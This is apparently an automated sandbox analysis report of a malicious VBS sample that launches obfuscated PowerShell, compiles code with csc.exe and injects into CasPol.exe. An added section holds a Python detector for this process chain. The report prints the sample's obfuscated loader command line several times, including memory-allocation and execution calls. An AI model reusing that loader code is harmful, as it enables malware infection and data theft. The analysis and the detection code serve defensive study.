CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: Initial file | semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
            Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4728
            Source: SIEM_PO00938467648.vbs, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
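The System Summary entries above (a script host starting PowerShell, a 4728-character command line, csc.exe compiling a .cmdline file out of %TEMP%, CasPol.exe started by PowerShell with no arguments, and the VBS ShellExecute call whose final 0 hides the window) are the facts a detection engineer would key on in endpoint telemetry. The detector below is an added example written for this report, not a Joe Sandbox or Sigma rule: it evaluates process events shaped like Sysmon Event ID 1, follows parent links to recover the wscript.exe -> powershell.exe -> csc.exe chain, and uses whitespace density as a cheap stand-in for the "long alphabetic blob" indicator. The sample events are constructed from the process tree in this report (PIDs, image paths and command lines as shown; the PowerShell command line is rebuilt by repeating the first 117 characters of the captured blob to roughly the recorded length). The thresholds, the injection-host list, the parent PIDs of the root processes and the benign control event are assumptions of the example.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1: ProcessId, ParentProcessId, Image, CommandLine."""
    pid: int
    ppid: int
    image: str
    command_line: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
# .NET framework utilities commonly hollowed by loaders; the list and the rule are assumptions.
INJECTION_HOSTS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
TEMP_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\Users\\Public\\", re.IGNORECASE)
LONG_CMDLINE = 2048           # chars; the report records 4728 for PID 6160 (threshold assumed)
MAX_WHITESPACE_RATIO = 0.05   # junk-padded blobs carry far less whitespace than real scripts (assumed)

def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()

def whitespace_ratio(s: str) -> float:
    return sum(c.isspace() for c in s) / max(len(s), 1)

def ancestry(ev: ProcEvent, by_pid: dict) -> list:
    """Follow ppid links upward until the parent is unknown or already visited."""
    chain, seen = [ev], {ev.pid}
    while (parent := by_pid.get(chain[-1].ppid)) is not None and parent.pid not in seen:
        chain.append(parent)
        seen.add(parent.pid)
    return chain

def classify(ev: ProcEvent, by_pid: dict) -> list:
    findings = []
    img = basename(ev.image)
    parent = by_pid.get(ev.ppid)
    pimg = basename(parent.image) if parent else ""
    if img == "powershell.exe" and pimg in SCRIPT_HOSTS:
        findings.append(f"powershell.exe spawned by script host {pimg}")
    if len(ev.command_line) >= LONG_CMDLINE:
        findings.append(f"very long command line ({len(ev.command_line)} chars)")
        if whitespace_ratio(ev.command_line) < MAX_WHITESPACE_RATIO:
            findings.append("command line is a dense character blob (likely obfuscated)")
    if img in COMPILERS and TEMP_DIRS.search(ev.command_line):
        findings.append(f"{img} compiling from a user-writable temp location")
        chain = [basename(e.image) for e in ancestry(ev, by_pid)]
        if SCRIPT_HOSTS & set(chain):
            findings.append("compiler descends from a script host: " + " -> ".join(reversed(chain)))
    bare_launch = ev.command_line.strip().strip('"').lower() == ev.image.lower()
    if img in INJECTION_HOSTS and pimg == "powershell.exe" and bare_launch:
        findings.append(f"{img} launched by PowerShell with no arguments (injection host?)")
    return findings

# --- constructed sample telemetry, modelled on this report's process tree ---
BLOB_PREFIX = ("LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv "
               "Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;")   # first 117 chars of the captured blob
PS_CMDLINE = (r'C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe "$Biliate = """'
              + BLOB_PREFIX * 40 + '"')   # repeated to approximate the recorded 4728-char line

SAMPLE_EVENTS = [
    ProcEvent(7696, 1000, r"C:\Windows\System32\WScript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"'),
    ProcEvent(376, 7696, r"C:\Windows\System32\cmd.exe", r"CMD.EXE /c echo C:\Windows"),
    ProcEvent(6160, 7696, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMDLINE),
    ProcEvent(4192, 6160, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline"'),
    ProcEvent(5484, 6160, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
              r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"),
    # benign control (constructed): an interactive PowerShell whose parent is not in the log
    ProcEvent(9000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-Date"),
]

def run(events: list) -> dict:
    """Return {pid: [findings]} for every event in the batch."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: classify(e, by_pid) for e in events}

if __name__ == "__main__":
    for pid, hits in run(SAMPLE_EVENTS).items():
        for hit in hits:
            print(f"PID {pid}: {hit}")
```

The chain rule matters more than the individual ones: csc.exe writing to %TEMP% is routine for PowerShell's own Add-Type, and a script host starting PowerShell is common in logon scripts, but a compiler whose ancestry includes wscript.exe is rare in legitimate use. The whitespace heuristic is tuned only to this padding style; a Base64 -EncodedCommand payload would need its own check.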
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_008EEB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_008ECEB9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_008ECEC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_079DE7B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_079D7180
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_079D91C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_079DE7A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07B429F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_1FA06BE0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_1FA0E5EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_1FA08B70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_1FA08C50
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203B7030
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203BAC70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203BC490
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203B94D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203B4510
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203BDE10
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203B6688
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203B0ACA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_203BECD0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_20491540
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_20492D68
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_20493810
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_204950D8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_2049458A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204948A0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204911C2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204914D4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B206 NtQuerySystemInformation,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B1D5 NtQuerySystemInformation,
            Source: SIEM_PO00938467648.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dll
            Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr 
CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AAB6 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AA7F AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ch5v15x.nhz.ps1
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:304:WilStaging_02
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara matchFile source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr 
CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45708 push C34C07A2h; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45640 push C34C07A2h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E3CD8 push cs; retf 5356h
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_0111B492 push 84DC2881h; retf
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
